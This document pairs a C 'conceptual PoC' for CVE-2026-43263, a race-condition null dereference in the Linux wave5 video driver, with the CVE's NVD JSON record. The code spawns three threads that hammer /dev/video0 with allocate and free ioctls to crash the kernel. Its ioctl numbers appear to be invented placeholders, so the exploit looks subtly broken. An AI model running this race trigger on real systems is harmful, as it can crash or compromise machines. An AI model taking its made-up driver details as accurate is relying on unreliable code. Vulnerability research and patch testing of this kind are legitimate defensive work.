CVE-2026-43263

#include <stdio.h> #include <stdlib.h> #include <pthread.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> // Conceptual PoC for CVE-2026-43263 // Targets the race condition in wave5 driver instance management. #define DEVICE_NODE "/dev/video0" #define IOCTL_ALLOC_INSTANCE 0x8001 #define IOCTL_FREE_INSTANCE 0x8002 void* race_thread(void* arg) { int fd = open(DEVICE_NODE, O_RDWR); if (fd < 0) return NULL; for (int i = 0; i < 5000; i++) { // Rapidly create and destroy instances to trigger the race ioctl(fd, IOCTL_ALLOC_INSTANCE, NULL); ioctl(fd, IOCTL_FREE_INSTANCE, NULL); } close(fd); return NULL; } int main() { pthread_t t1, t2, t3; // Spawn multiple threads to increase contention on vpu_instance pthread_create(&t1, NULL, race_thread, NULL); pthread_create(&t2, NULL, race_thread, NULL); pthread_create(&t3, NULL, race_thread, NULL); pthread_join(t1, NULL); pthread_join(t2, NULL); pthread_join(t3, NULL); return 0; }

{"cve": {"id": "CVE-2026-43263", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:47.257", "lastModified": "2026-05-08T20:33:12.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: chips-media: wave5: Fix Null reference while testing fluster\n\nWhen multi instances are created/destroyed, many interrupts happens\nand structures for decoder are removed.\n\"struct vpu_instance\" this structure is shared for all flow in the decoder,\nso if the structure is not protected by lock, Null dereference\ncould happens sometimes.\nIRQ Handler was spilt to two phases and Lock was added as well."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.8", "versionEndExcluding": "6.18.16", "matchCriteriaId": "12C05E5A-F731-4E9B-94E0-2E3F7FBA69A3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/d12bcf183ec7da4305d848068d15f18044eaf62a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e66ff2b08e4ee1c4d3b84f24818e5bcc178cc3a4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ea316b784fe6a61b29131c98cddb24e651b1dcbc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}